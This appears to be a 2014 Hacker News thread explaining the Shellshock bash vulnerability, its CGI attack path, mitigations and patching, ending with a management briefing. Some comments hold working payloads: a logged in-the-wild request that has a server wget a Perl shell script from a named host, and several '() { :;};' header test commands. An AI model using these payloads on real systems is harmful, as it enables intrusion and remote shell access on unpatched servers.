This is being actively exploited. We (CloudFlare) put in place WAF rules to block the exploit yesterday and I've been looking at the log files for the blocking to see what's going on. Have been seeing things like:
Yeah, that's certainly the case with a couple of them and then there's one's like this that are trying to set up shells and where they've been established:
Request of file: /cgi-sys/defaultwebpage.cgi
With wget downloading a perl script to launch a shell:
() { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\x22
That site is still up and serving right now if anyone wants to take a look.
CloudFlare is so amazing... Thanks for all your hard work. I have over a million blocked malicious attempts on my site which gets a huge amount of traffic (not shellshock, I mean in general).
Out of curiosity, have you considered enabling it temporarily for everyone with Shellshock rules enabled? Just a day or two, to give people time to fix this. Is it feasible with your infrastructure/the way WAF works (I never used one)?
It could do a lot of good for people and be a great PR move at the same time.
Consider that the bug can be used as an amplification attack and you have a lot of webservers behind the free plan. I'm guessing you don't want to have Cloudflare's infrastructure be the IPs that everyone is blocking because some yoyo is using this to turn those machines into DDOS slaves. Might help your case internally.
Sad. This situation feels kind of a disaster-relief thing; not a good time to think about monetizing it. Still, I do understand you don't want people thinking you'll always be protecting them from everything even if they don't pay.
EDIT2 after clarification downthread, previous edit is to be disregarded.
It's less about trying to monetize it than about the cost to us of suddenly inspecting every request that goes through us. We service a huge volume of traffic and part of our core value is performance so keeping our processing latency is low as possible is important.
(Note: I removed sentence about CloudFlare pricing from previous comment to avoid any confusion about monetization)
The monetization has not been put in place right now. It has always been there (the possibility to add these rules).
If this is a disaster-relief thing-y, CloudFlare should then be eligible to receive government money later. I doubt that would be even considered by any parties.
Paying customers get protection automatically while free customers do not?
I think this is not something which should be treated as a "value-added service" for your paying customers. The health and security of the Internet is far too important.
All your customers should be protected automatically.
Read a bit about this because I didn't understand CGI. tl;dr version of what's going on here, if I'm not mistaken (assuming apache/php for this example):
1. Web server (apache) gets request to route to CGI script (PHP)
2. Per the CGI spec, apache passes the request body to PHP as stdin & sets the HTTP headers as environment variables, so PHP can access them
3. In the PHP script, `exec`/`passthru`/`shell_exec` etc. is called to do something in the shell/on the system level. This spawns a new shell (which may be bash)
4. bash interprets the environment variables set by apache
The rub lies in step 4: when bash interprets an environment variable called `HTTP_USER_AGENT` containing the value `() { :;}; /bin/ping -c 1 198.x.x.x` it "gets confused" & interprets that first part (before the second semicolon) as a function, then executes the second part as well
Hopefully this answers the "how does the exploit get from the browser to bash?"
Further question: "If I do not use exec/shell_exec/popen etc, am I still vulnerable (just by virtue of using mod_php)?" AFAICT No, but I am not really sure (I hope someone clears this up).
Can someone who understands CGI enlighten me why (oh why) everyone treats #4 as the main problem instead of #2 ?
I mean, looking at it from an outside perspective, I can interpret #4 as working as intendeed (attacker calls my shell with arbitrary parameters and, naturally, my shell does arbitrary things controlled by the attacker), and #2 as a total WTF - why is apache passing arbitrary input data to global-scoped (as in, affecting the subsequent bash invocations) environment variables; and can it stop doing it? If not, why is apache passing this data without any verification/sanitization/escaping, and can it stop doing it?
The fixes to the bash flaw seem like a band-aid - if some web service invokes other programs that somehow get called with attacker-defined environment variables, then it seems like a potential for future exploits on other targets than bash; many other things will change their behavior depending on the environment vars.
It's not setting arbitrary environment variables, it's setting specific ones. Bash is basically calling eval on the list of envvars without re-escaping the values.
The people who wrote the CGI spec didn't expect that to happen at startup.
csh and zsh don't do it, and I can't think of any reason why someone would want that.
CGI was always a kludge, and envvars weren't a great choice, but they were presumed to be safe for arbitrary data.
In your opinion, what is the difference between php blindly passing unsanitized user input onwards to bash, and apache blindly passing unsanitized user input onwards to php?
Furthermore, in the sample attacks the php scripts don't 'use' that user input in any way; bash gets them because, well, it shares the same environment and its variables. If you'd want a php script 'sanitizing' those variables then it would mean checking for any possible HTTP_ environment variables and explicitly altering them even if the script doesn't recognize them - which seems ridiculous as well.
Imagine a dev using eval() in PHP. The PHP interpreter creates a new environment, executes your (presumably sanitized) code, but also automatically calls eval on every global variable in your app.
That would be a huge bug in PHP, and it's the equivalent of what bash is doing.
1: Why does Bash "interpret" the environment variables' values? What is the expected result of setting a function definition as the value of an environment variable? In my worldview (which is clearly wrong) there is no reason for Bash to look at environment variables' values until they're evaluated.
2: This is probably besides the point: but since when is the empty string a valid function name? I can't get Bash to accept "() { :; }" (as opposed to "f() { :; }" as valid bash.
Basically, Bash interprets environment variables at start up as a means for you to pass functions into subshells. Whenever an environment variable's value starts with "() {", it is interpreted as a function, which is named according to the environment variable's name.
I guess even without the bug under discussion this feature is a theoretical security flaw. If you set your user agent to "() { ping your.domain.com}", a function named HTTP_USER_AGENT, which pinged your.domain.com would exist in any shellThe name of the function is passed as the Apache spawned. It's not hard to imagine a buggy script accidentally executing it.
As far as I can see, this is largely correct. But do realize:
- that environments are inherited by child processes.
- It's not just Web servers that might execute scripts (DHCP could also be vulnerable, SSH with command restrictions, many other things too).
That's the big shitstorm about this bug. It's very hard to determine when you're actually vulnerable. The safest thing to do is to upgrade bash everywhere. But wait! The patches they rolled out don't actually fix the issue all that well. So there's no easy one-stop guide you can follow to fix this. Everybody actually has to think about every single system that might potentially be vulnerable and come up with a good solution all by themselves.
I don't quite get it yet. Let's suppose someone sends a header like this: 'User-Agent:() { :; }; touch /tmp/shellshocked'
Then in my cgi script I do a harmless system('date') call. The file /tmp/shellshocked won't be created right? The file would have been created had I done for example a system('echo $HTTP_USER_AGENT') call. (That is, one needs to explicitly reference the environment variable that gets passed to bash). Is my understanding correct?
No, bash interprets as functions ALL environment variables that begin with '() {' on startup. If you have an unpatched bash it will also excute any trailing commands after the function definition. You don't need to manually reference any environment variables at all to be vulnerable. This is to how the bash feature of exporting functions to subshells ("export -f") works.
This is not my understanding. My understanding is that because this mechanism is intended to pass functions down to the system() call, all environment variables are parsed up front in case they contain any. Because the vulnerability lies in the parsing, it doesn't matter whether you reference the variable in the subsequent shell process or not.
echo $0 -> bash
ls -l /bin/sh -> /bin/bash
GNU bash, version 3.1.17(2)-release
Apache/2.2.25
And I couldn't reproduce the vurnerability in a perl cgi script unless I had explicitly referenced an environment variable in the system() call like I posted above. I thought all versions are vurnerable.
If there is only one scalar argument, the argument is checked for shell metacharacters, and if there are any, the entire argument is passed to the system's command shell for parsing (this is "/bin/sh -c" on Unix platforms, but varies on other platforms). If there are no shell metacharacters in the argument, it is split into words and passed directly to "execvp", which is more efficient.
Passing a shell metacharacter to the system function does indeed then trigger the vurnerability. Thanks as I didn't realize it wasn't calling the shell otherwise.
My understanding was that although regular CGI respawns the command interpreter every time the web server is queried, FastCGI reuses the same command interpreter and just updates the environment.
I have no sympathy really for people who use `system()`-style calls, or bash in their web servers. Bash is fairly obviously designed with complete disregard for security. I seriously doubt this is its last major flaw.
But anyway, is it really that common? I would have thought most CGI scripts are Python, Perl, PHP, etc. and don't use `system()` type calls. Right?
No, super wrong. Underneath the hood there are all kinds of things that go on and result in system() or similar calls. Think about every module in CPAN / PyPI / whatever. Any non-trivial Web app has a high likelihood of eventually, somehow, somewhere, causing a system() type call to fire off.
This is actually quite common and acceptable if you want to interact with a piece of software for which there is no library or api. One real world example is producing thumbnails from Word documents using Libre Office.
You don't have to do it explicitly either. In Perl, for instance, doing stuff like open($tgz, "|-", "gzip | tar -cvf /tmp/file.tgz"); is going to cause execution of /bin/sh behind the scenes. Assuming that /bin/sh is never called during processing of external requests is risky.
Since the post is relatively non-technical, I'd like to underscore that there are substantial concerns with the original and the followup patch, because with or without it, the underlying bash code parser is still exposed to the Internet. Nobody has posted an RCE vector that would be universally bad for the patched version, but several people have already identified "hmm, that's unexpected" types of global side effects when attacker-controlled strings are parsed as functions by bash. More is likely to come.
As of today, based on our conversations on oss-security, there is a third, unofficial patch that takes a much saner approach of isolating exported functions in a distinct namespace:
Especially in high-value or high-risk scenarios, you may want to give it a try. And if you're interested in the reasons why the original patch is problematic, check out:
The idea of using bash to do anything with input coming from the internet is asking for trouble, really... It's just a flaw with how CGI works generally, and how PHP etc. encourage you to build webapps.
It's the same principle as SQL-injection attacks (and the flaw is there for the same reason! It's the obvious quick solution to just query mysql with "select * from users where username = " . PARAMS['username']....
But this is far more dangerous -- injecting malicious SQL can reveal data, or break things. Injecting malicious bash commands can reconfigure your server to do whatever they like.
I've worked with sysadmins that insisted that CGI be disabled for exactly this reason. If we wanted a dynamic website we needed to use mod_perl or mod_php (it was back in the early 2000s, Rails/Django/nginx hadn't yet been invented). It wasn't a perfect solution - both of them still had plenty of security vulnerabilities - but it cut down the attack surface significantly.
Now I understand what all the security people who said "never use system(). Never, ever" meant.
The dangerous thing is that lots of things that look like a library call to the unwary developer actually call out to other processes (visible if you run strace). This vulnerability will not be limited to web servers, either, and there will likely be systems that escape or unescape parameters in ways that evade app firewall rules.
So trying to understand the issue here, is this actually a bash thing or a problem with the web server forwarding commands to bash? I don't understand why bash would be listening to network traffic on its own.
Not just web servers, but anything that calls system() or popen() is really calling the system shell, /bin/sh. On many systems, /bin/sh is really bash in sh compatability mode. That means all those perl scripts, CGI scripts, even DHCP clients expose the vulnerability. Ubuntu runs dash as /bin/sh instead, and most BSDs run ash, so they're not as vulnerable.
Edit: also, if you have ssh access to a non-login account, like for git access, this could execute commands on the remote host as if you had a shell.
Would a python web server (gunicorn, wsgi) behind nginx be vulnerable to this kind of problem?
I'm just pondering all the python library code out there which relies on calls to subprocess.Popen() to get things done. It seems like dynamic scripting languages with a tendancy to shell out to the system could be at risk of this or similar attacks.
No, because wsgi (i is for an interface here) does not use shell to pass data. Subprocess.Popen would only be a problem if it passes user-generated data as environment variables, and it doesn't do that by default. That's rarely needed, but you may want to review your code to be sure.
Actually I just tried on an app that runs on Gunicorn and does a Popen with shell=True, and it is vulnerable. A simple curl -A '() { :;}; touch /tmp/owned' did create the file on the server.
That was my first question as well. The behavior sounds like exactly the kind of magical weirdness you get with shells. Your question is asked and answered here: https://stackoverflow.com/questions/26022248/is-the-behavior... The answer given there is that the behavior is NOT a documented feature; it's a side-effect of how bash implements inherited functions.
I was also very confused about why a web server would need to store HTTP headers in environment variables. Why would a mature piece of software like Apache do something so hackish? The explanation turns out to be very simple: it's how CGI works. Headers are passed to the CGI script as environment variables. If you don't do it that way, you don't support CGI.
There's one thing that still confuses me, though: why would a CGI implementation use the shell to set environment variables? Why would you use a complex, idiosyncratic piece of software that comes in many different flavors instead of just using the C setenv function?
So does that mean that running a bash script under cgi doesn't inherently expose you to the vulnerability, you're vulnerable only if the bash script called invokes a shell in a sub-process?
If you're running a bash script as a cgi script in your web server, you're already vulnerable in half a dozen ways. Nobody does that.
If you're running a php/perl/python/ruby script as a cgi script in your web server, and that script calls system() or some variant thereof (backticks in perl, os.system in python), then you're vulnerable to this.
Not many people does that, but those who do won't be things you think of as web applications. They're going to be web control panels you installed and forgot about, or cheap home routers that nobody knows who made the firmware to.
No, running a bash script through CGI is definitely dangerous. What's safe is if your CGI handler is a non-bash program like PHP that reads the environment variables itself and doesn't itself pass those environment variables on to bash.
> why would a CGI implementation use the shell to set environment variables?
This is exactly my question; that, and: if this is so, then isn't any script that uses mod_cgi (e.g., PHP, Perl, etc.) vulnerable? Yet there are multiple statements that only cgi scripts written in bash are vulnerable.
I haven't been able to resolve this apparent inconsistency in the description of how the bug works in the case of CGI, which may be a critical factor in understanding ones own vulnerability. What exactly is the order of execution here in the case of mod_cgi?
Those statements aren't correct. A ShellShock exploit has two steps:
1. Attacker somehow gets to set an environment variable. Since CGI converts HTTP headers to env vars (Host: -> HTTP_HOST, etc), a CGI-enabled server is an easy way to make this happen.
Step 1 on its own would be alarming but ultimately harmless--the variables may contain malicious values, but they can't be used to hurt you if you treat them as untrusted or don't even read them. But since this is *nix, those possibly malicious vars will be inherited by children spawned by the affected process.
If one of those children is Bash, then (regardless of the shell command):
2. When starting up, the Bash process will parse the currently defined environment for things that look like functions and import them. The "ShellShock" portion of this bug is that the parser will keep parsing past the function's closing brace, which means it runs whatever trailing code might be there. Of that trailing code was set by an attacker, with the expectation that you'd start a vulnerable Bash, you're owned.
So every time Bash is launched, for any reason, it spins through all of the environment variables and executes anything it finds as long as it's preceded by a fairly simple pattern?
To me, what seems disturbing isn't the extent of the vulnerability, but how long it took for someone to notice it. How many other "shallow" bugs like this one have been missed by the proverbial many eyes?
In principle it shouldn't execute anything, it's only supposed to parse functions. The problem is that it's such an obscure feature I bet almost no-one knew it existed, the many eyes didn't exist in this case.
Statement #2 is the simple expression of the issue that's necessary for understanding it, notably missing or obfuscated in all the other massive verbiage on the topic today.
There are a TON Of servers out there running PHP through good ole CGI. I would imagine that some of those are running web apps that lots and lots of people use. Meaning you now have shell access to those machines.
Mining username/passwords is probably going to be pretty simple. I wonder how many of these machines have credit card numbers stored in the clear? I'd bet that there's a bank somewhere running in exactly that configuration.
This is "end of the world" mostly because of all the "things" (a la "Internet of things") like toasters, microwaves, refrigerators, etc. all have vulnerable bash versions.
Its a bash thing, or more specifically, the issue is with the fact that many (mostly old) web applications/web servers pass content from user straight to bash as environment variables,
not expecting this to cause any problems.
The latter. Some daemons, like CGI scripts will spawn a shell populated with environment variables from the client. With a vulnerable bash, commands in these get executed.
All HTTP servers invoking scripts over the Common Gateway Interface (CGI) put user-supplied input into environment variables as part of their invocation process, because that's what the CGI spec says to do. Many other daemons perform similar techniques to communicate with subprocesses that they spawn to do work. And when launching a new process, environment variables are (by default) copied from the parent process.
The CGI script itself is neither a daemon nor responsible for populating the environment (merely for invoking system()). Also, most HTTP servers try to go out of their way to avoid invoking shells and instead invoke CGI scripts directly, saving on overhead.
More broadly, if ANY process puts ANY client-supplied input into environment variables and subsequently that process or a subprocess happens to spawn a copy of bash by calling system(3), then you're in trouble.
Unless I've missed something, could some benevolent person use the bug to cause remote systems to run something like "sudo apt-get update && sudo apt-get install bash", to patch the vulnerability automatically? (it makes lots of assumptions, but surely it's better to have some patched systems as a result.)
Certain worms include a patching step like this when they infect a machine to avoid losing control via re-infection.
For a high school science research course I did an epidemiological modeling study on how "good" reverse-worms might affect the spread of infection, they're a pretty interesting thought experiment. With something involving exponential growth like this, early movers have a significant advantage.
As far as I know, there hasn't been a successful reverse-worm that did not accidentally cause worse issues (flooding local networks with a high density set of boxes doing over-zealous scanning, or accidentally destroying boxes due to a slapdash narrowly tested script).
Reverse-worms they can either wait around, detecting requests from infected-but-not-patched systems to re-infect and patch them—or just start scanning IP ranges themselves. The former feels somewhat less pernicious. "Try to infect this computer, you will be patched and help patch." But that relies on other worms not patching their zombies.
It may be possible to exploit the bug for "good" reasons like patching the bug, but the patches that are out now don't seem to properly plug the exploit, and as with any update there are plenty of considerations that could end up bricking the application.
Aside from the "it's not yours to fix" angle, you have to weigh the moral benefits of possibly patching the exploit, possibly crashing the application (I bet this is much more likely than a successful fix at this point), and wait-and-seeing whether the application owner patches the exploit on their own (along with the risk of a compromise in the mean time).
Edit: Of course there are a slew of legal issues with attempting this as well.
"could some benevolent person use the bug to cause remote systems to run something like "
That's not benevolent that's intrusion. Nobody has the right to take it upon themselves to determine what someone else should be doing in this case. I would imagine that an action like that would also clearly violate a law or two (I'm sure others more knowledgeable could cite the law).
At the risk of participating in a philosophical debate, I pose a classic counterexample:
You encounter a car parked on the side of the road in the middle of nowhere. Its windows are rolled down. Storm clouds are rumbling nearby and it's obviously about to rain. There's nobody around but you.
Do you also consider rolling up the windows to be intrusion?
Personally I'd feel an ethical obligation to help the stranger out by preventing damage to his/her property. However I can completely understand people leaving well-enough alone.
Law aside, I'm much more on the fence about people automatically scanning for and "fixing" vulnerabilities, however. On one hand, how do you know you're really helping? On the other, as someone who's maintained a server or two, I'd rather be solving problems caused by a well-intentioned whitehat than miss problems caused by ill-intentioned blackhats.
"Do you also consider rolling up the windows to be intrusion?"
Yes definitely. Really no different than if you would want someone to
enter your house to close your windows.
Now you might say "well what if it can be done from the outside" without entering?
That is a bit different.
Except for one thing. What if someone saw you doing that? What if the owner saw you doing that and didn't know why you were messing with their car? (I had this happen with a boat one time btw.). There is an immediately sense of shock because you don't know what is going on. And in that case who knows what will happen? Maybe they might start a fight or shoot you. That's not good for anyone. Maybe they have something valuable in the car that they think you are going after. Maybe they have serious mental problems.
Here's the point. It's one thing if you see a baby in a hot car and decide to take action. The benefit outweighs the risks. But it's another thing if you decide to roll up the windows to prevent someone's car from getting wet inside (covered by homeowners insurance with low deductible in many cases ntim though). Different story. Make sense?
sudo requires a password to be entered by default, right? I would guess that for most setups this wouldn't be possible without some kind of privilege escalation as well (or if the webserver was running with root privileges).
You'd be surprised by the number of servers that don't ask for password when you try to use sudo. They just assume that the actual owner issued the command and go straight to issuing the command as root.
(Caveat: typically it has to be a certain user)
I'm ashamed to admit I used to think that was convenient. It makes systems infinitely more vulnerable in the event of an RCE bug.
Many systems still use passwordless sudo to permit certain users to run specific commands -- but now, if those commands are shell scripts run via bash, the users can execute arbitrary commands (this isn't an uncommon class of privilege escalation problem, though).
sudo can be set up lots of different ways -- including such that there's no password needed.
> its not like this is a logged in ssh session
That's not correct -- whatever user is executing your CGI scripts is the "logged-in" user in bash, right?
Obviously that user should be quite locked down, and should not be allowed to run sudo at all, let alone without a password... but there are so many amateur server admins out there that I imagine there are quite a few servers where this is a serious problem (with or without sudo access enabled for the executing user).
If you're running Apache on Linux/UNIX, and don't absolutely need CGI, it's straightforward to turn it off in Apache.
Put a "#" in front of
LoadModule cgi_module modules/mod_cgi.so
in /etc/httpd/conf/httpd.conf. This prevents the code that runs CGI scripts from even being loaded with Apache, and will totally disable all CGI scripts. Apache is willing to execute CGI scripts from far too many directories, and many Linux distros have some default CGI scripts lying around.
This will break CPanel, but not non-CGI admin tools such as Webmin. I can't say anything about PHP; we don't use it.
People are out there probing. This is from an Apache server log today from a dedicated server I run.
The source is on "i3d.net", which is a hosting service in Rotterdam NL. So someone is running probes from something bigger than a desktop. I sent their support people a note.
For Mac OS X, until Apple releases a software update, I've applied the original CVE-2014-6271 (shellshock) patch and am going to apply the CVE-2014-7169 patch as well once it passes review. Repository and instructions to reproduce without trusting me are located here:
The problem is that some utilities rely heavily on bashisms such that they're unlikely to work with dash or other POSIX-compliant sh-replacements. As an Arch user, just off the top of my head, I can think of yaourt (AUR helper) and apparently the shell script for invoking gradle as both reliant on such behavior. The latter may not affect everyone, and after running into just those two samples today, I can only imagine what else may be affected.
The best solution I could think of as a work around is to install dash, replace the /bin/sh symlink pointing to dash, and then chown/chmod bash so that only those specific users who need to use it can use it. This isn't perfect, because it could still be affected by web services that run as users that would then have access to bash via their member group(s), or because a web service might rely on another application that itself requires specific bashisms in order to function.
This is why abandoning correctness for convenience can be dangerous.
A question worth asking: how long has this been exploited? If you have years of Apache logs, go back through them with "grep" and look for attempts to exploit this vulnerability. Report the earliest date on which you find a hit. Thanks.
It would be really nice if log aggregation services (Splunk, Loggly, Papertrail, etc) would do this, notify affected customers, and publicly release anonymized information about it.
Things like that lower the risk: run everything as a low-privilege account (better, not even www-data but per-site), chroot()-ed, etc. and certain classes of attack will either fail or at least be easier to clean up.
The problem with all of this is that it assumes that you don't have privilege escalation vulnerabilities on the local system, which is often not the case unless non-trivial effort has gone into hardening the server – e.g. all of that privilege separation is a waste if someone sledgehammer-ed a chmod 777 into a script rather than setting the appropriate ownership and permissions or someone delayed a kernel update because they didn't want the downtime and “knew” that only trusted code ran on that system.
Apache user can probably write to /tmp, and from there the attacker can construct a way into the system (bindshell, reverse shell). He can then start reading your PHP config files (db passwords) or try to use other vulnerabilities to escalate his privileges.
It doesn't seem to have trouble writing to /tmp in a typical low access scenario. Seems to me, anything can write to /tmp. Default seems to be 777 on /tmp.
I had someone exploit my Pydio install a few months ago with a litecoin miner. He managed to drop and run it in /tmp. He probably couldn't write and execute to too many other places.
From the article, it sounds like the issue is not just with Apache but also ssh, DHCP and others. So I'd just assume you're still at risk regardless of your Apache user configuration. (in any case, it's safer to act as if)
I've just our few Apache 2 systems that are Internet facing. Some of the site configs did have the standard Ubuntu CGI stanzas in them. However, the `/usr/lib/cgi-bin` directories were empty.
All this has made me a bit nervous though. I certainly didn't change the system to use bash instead of dash.
The passwd file contains the login shell configured for that user. Operating in the context of a daemon for most sane applications, this configuration doesn't (or shouldn't?) matter unless the user logs in. [1]
For Apache, I believe /bin/sh (or the shell it points to) is what's at issue here. [2]
Unless the distro changes it, APR defines SHELL_PATH as a macro pointing to /bin/sh (note this isn't the homonym env variable, that would be a serious problem if it was since shellshock allows setting env variables by other means that are very public by now).
In a system I have access to, the installation procedure for some servers (not webserver necessarily) includes creating users with a full environment to be able to issue commands for these servers at a higher privilege. At the creation of these users, Ubuntu Server assigned them bash as their shell. I wonder if they're attackable at their public ports, but I haven't bothered trying to find attacking vectors since they were in production and the sysadmin got rid of bash as soon as he could. Not giving much detail here since I assume there will be plenty of compromised servers in the wild right now, including DB servers, proxies, etc.
from my understanding mod_php is not affected. However, if you have any system() calls in your PHP code AND you allow user input to be used in those system calls, then /bin/bash could be executed via the system call. If you control what is running in your system call - i.e.
system("echo 'hello world'");
then I believe you are OK. But that's "security 101" and you should never be opening a system call to user input.
I must not be understanding how this works then - how would /bin/bash be executed from a PHP system() call unless it was called directly from the command? And if you don't allow user input into the system call, how is /bin/bash going to be inserted into it? Thanks!
Yeah I get that - but surely just _calling_ /bin/bash isn't enough - you have to be able to pass in the arguments to bash that enable this exploit. And if you're not allowing user input into your system call, I still think this is a non issue in this scenario.
If php is being run from mod_cgi, then it is exploitable.
The full chain of the attack:
Request sent to the url, containing headers with '() { :;}; codehere'
Per CGI standard: environment variables are set with the attack code.
PHP is executed directly, with the environment containing the attack.
PHP calls system - the same environment is there, meaning the code is executed if /bin/sh points to bash.
N.B. - If /bin/sh is not bash, but the program executed by system() itself executes a call to system() which points to something explicitly calling a bash ( apply this if recursively), the exploit is triggered.
It's not about passing "arguments" on the command line, its about what the environment variables are. It's not always immediately obvious how the env vars are constructed - everyone points to CGI because it's a well known scenario, but there are plenty of other cases where environment variables are set from user data.
tl; dr - in any situation user input is used in environment variables, simply calling /bin/bash is enough.
Yeah - that would not be an issue for mod_php since it is about DHCP - if you're server gets it's IP from DHCP, then there's a potential issue, but since we're talking about mod_php here (not running PHP as a CGI, just mod_php) then the linked post is not related.
this is a super fringe case, and wouldn't warrant this big of a deal. for this to be a 10/10 issue, it has to mean that processing the header files in Nginx/Apache results in some buffer overflow or for those values to be directly fed to bash.
otherwise the risk is super minimal, so I don't think it's a matter of making system/exec calls on user-supplied data.
No, you fundamentally and dangerously misunderstand the bug.
Your "exec($SomeVar)" example is a standard, unsanitized-input-passed-to-command-line type bug.
Shellshock does something fundamentally different. Everything on the actual command line is irrelevant to shellshock.
What happens is that the child Bash inherits env vars from the parent (which is often the web server). The shellshock bug is that the ENV VARS THEMSELVES are evaluated by bash as instructions.
Your actual PHP or whatever can be fully up to best-practices, sanitizing cookies and inputs, etc., and still fall vulnerable if one of the server-set environment variables like HTTP_ACCEPT_LANGUAGE has a malicious payload and ANYWHERE in your code, a subsequent system() call deep within some imported module gets fired off.
I'm sorry, my lack of understanding it was supposed to be apparent in that post, and indeed you clarified that it's actually more the second scenario I hinted at. I was responding to people talking specifically about an underlying language making system calls and that not making said system calls from the language itself would keep you safe.
You're confirming the suspicion that I had. To wit:
"for this to be a 10/10 issue, it has to mean that processing the header files in Nginx/Apache results in some buffer overflow or for those values to be directly fed to bash."
Not a buffer overflow, but if those headers are being fed upwards into bash, that's what we're both talking about.
Don't forget to update any Docker instances of OS's. My brother just challenged me and I'd assumed my Docker Ubuntu instances would be updated automatically by updating the main Ubuntu OS but that was not the case. In my defense I'm still new to Docker.
I also used this to list my containers:
docker ps -la -n=100
And removed them all, then listed images:
docker images
And removed them and then ran this to get the latest ubuntu installed from docker:
The new docker image of ubuntu is still vulnerable.
Edit: Updating the container then committing it (Docker terminology) should ensure that container stays updated, though any new runs creating new containers would continue to be vulnerable I suspect until Docker patches them or whomever would be responsible to do so.
Does anybody has steps what to do really as a sysadmin? Do I only need to install newest bash (on Linux systems) or do I also need to restart daemons like nginx/apache etc. ?
The vulnerability only affects bash when it is parsing environment variables, when it is just starting. So if a process is already running, it's not vulnerable and you don't have to restart it. You should definitely apply the patch from Wednesday, but be aware there is a related vulnerability that has no patch yet.
If you get "busted" back, then you're affected...which is what I get with Mac OS X 10.9...however, when I try it on an Ubuntu server (14.x) that hasn't been patched in awhile...I don't get the error...Er, why is that? I thought this pretty much affected every bash since 25 years ago?
(Someone else in this thread mentioned that Ubuntu uses dash...so...all modern Ubuntu servers are OK?)
No, you are not OK. Replace "sh" in that command with "bash" and you should still see the issue.
There is a lower likelihood that you'll see the issue, as anything which just uses sh (including the "system" function, and similar ones) will use dash indeed of Bash; but there will still be places where bash is called explicitly, including many shell scripts that depend on bash features, which are vulnerable.
The attack isn't against terminal shells. The biggest risk is against things that use the shell implicitly like system()/popen()/etc and they all use /bin/sh
It's certainly possible to be at risk if, for instance, you had a CGI script that was specifically written in bash (i.e. starts with "#!/bin/bash") but that's a lot less likely.
So definitely patch your Debian/Ubuntu/etc machines but do your Redhat-based ones (and other places where "/bin/sh --version" indicates that it's bash) first.
It seems arbitrarily risky to say, effectively, "My bash is vulnerable, but it's OK because it's unlikely to be called due to the defaults being Something Else" -- that might be short-term reassurance, but it sure sounds safer to fix it even if you don't think it can be exploited.
By default I mean that new users are given bash as sh by default, including the users for daemon services. So unless you assigned a different shell, or the service specifically asked for a shell other than the default linked by /bin/sh, then they will be running bash.
When you use any functions in PHP to spawn another process (with the exception of pcntl_fork), PHP will execute a shell to run your process. That shell is then inheriting the parent environment.
If you (or any libraries you use) do not shell out or if you're using php_fpm (which clears the env and passes headers out of the environment), the. You are safe.
I think I have the same question.. why is this called a "bash" bug? Is it not a webserver bug? Why does the webserver send data to bash through environment variables? Is there no better way to do it?
CGI is an interface first defined 1993, 21 years ago. No one thought setting user data in environment variables was a risky thing at the time.
More modern interfaces between dynamic code and webservers, like even FastCGI or SCGI or dozens of others do not pass user data over Environment variables, and instead pass data in various protocols over a socket.
It's a bash bug because the bug is ultimately in how bash parses environment variables. My understanding is quite limited, but IIUC, after the invalid function definition, the bash parser simply stops trying to parse the environment, and the remaining input tokens get used as arguments to the next command executed by the shell.
Sort of I guess, but why does bash need to loop over all of the env variables and execute them? I don't think CGI had any reason to think that would ever happen?
Bash is a shell, part of it's purpose is to deal with enviroment variables. The bug here is that the parser is getting confused, the feature being abused here is being able to declare functions as part of an enviroment variable, which is used to transfer functions to subshells in bash. Now this itself is fine, but since the parser gets confused it also executes commands after the function definition.
but it's generally understood that attackers should not be able to provide enviroment variable names. If the attacker can do that, they can also provide an alternative LD_PRELOAD variable.
I honestly can't see why this is "fine"... I understand it's not the security critical bug, but feeding all environment variables into some sort of interpreter...?!?
Ok, bash needs to transfer function definitions to child processes in order to implement something called inherited functions, and I guess you could argue that an environment variable is a reasonable place to store them. But WHY THE HELL does bash have to use the function name as the variable name?!? That's just insane to me...
Any sane programmer would store that shit in an environment variable with a known name (e.g. "BASH_INHERITED_FUNCTIONS"). Why doesn't bash do that?!?
It appears they are talking about requiring prefixes for these vars (finally). Still, you look at the c code / macros that parse this shit and have to shake your head. This is what they mean by "attack surface". http://www.openwall.com/lists/oss-security/2014/09/25/13
Folks, for what it's worth, here is a management briefing I wrote this morning. Please feel free to re-use, but please do give proper attribution. Please do comment and correct as appropriate.
Summary: Briefing for management on activities to minimize impacts of the "shellshock" computer vulnerability.
Status: Testing underway. Initial appraisals are that public-facing systems are likely not subject to shellshock. NOTE: The situation is fluid, due to the nature of the vulnerability. Personnel are also reaching out to hosting providers to assess the status of intervening systems.
What is it? A vulnerability in a command interpreter found on the vast majority of Linux and UNIX systems, including web servers, development machines, routers, firewalls, etc. The vulnerability could allow an anonymous attacker to execute arbitrary commands remotely, and to obtain the results of these commands via their browser. The security community has nicknamed the vulnerability "shellshock" since it affects computer command interpreters known as shells.
How does it work? Command interpreters, or "shells", are the computer components that allow users to type and execute computer commands. Anytime a user works in a terminal window, they are using a command interpreter - think of the DOS command prompt. Some GUI applications, especially administrative applications, are in fact just graphical interfaces to command interpreters. The most common command interpreter on Linux and UNIX is known as the "bash shell". Within the last several days, security researchers discovered that a serious vulnerability has been present in the vast majority of instances of bash for the last twenty years. This vulnerability allows an attacker with access to a bash shell to execute arbitrary commands. Because many web servers use system command interpreters to fulfill user requests, attackers need not have physical access to a system: The ability to issue web requests, using their browser or commonly-available command line tools, may be enough.
How bad could it be? Very, very bad. The vulnerability may exist on the vast majority of Linux and UNIX systems shipped over the last 20 years, including web servers, development machines, routers, firewalls, other network appliances, printers, Mac OSX computers, Android phones, and possibly iPhones (note: It has yet to be established that smartphones are affected, but given that Android and iOS are variants of Linus and UNIX, respectively, it would be premature to exclude them). Furthermore, many such systems have web-based administrative interfaces: While many of these machines do not provide a "web server" in the sense of a server providing content of interest to the casual or "normal" user, many do provide web-based interfaces for diagnotics and administration. Any such system that provides dynamic content using system utilities may be vulnerable.
What is the primary risk? There are two, data loss and system modification. By allowing an attacker to execute arbitrary commands, the shellshock vulnerability may allow the attacker to both obtain data from a system and to make changes to system configuration. There is also a third risk, that of using affected systems to launch attacks against other systems, so-called "reflector" attacks: The arbitrary command specified by the attacker could be to direct a network utility against a third machine.
How easy is it to detect the vulnerability? Surprising easily: A single command executed using ubiquitous system tools will reveal whether any particular web device or web server is vulnerable.
What are we doing? Technical personnel are using these commands to test all web servers and other devices we manage and are working with hosting providers to ensure that all devices upon which we depend have been tested. When devices are determined to be vulnerable, a determination is made whether they should be left alone (e.g., if they are not public facing and patches are either not yet available or would be disruptive at this time, or if there are other mitigations or safeguards in place), patched (e.g., if patches are available and are low impact), or turned off (e.g., if patches are not available, risk is high, and the service is not mandate critical).
Updates to this briefing will provided as the situation develops.
> Initial appraisals are that public-facing systems are likely not subject to shellshock.
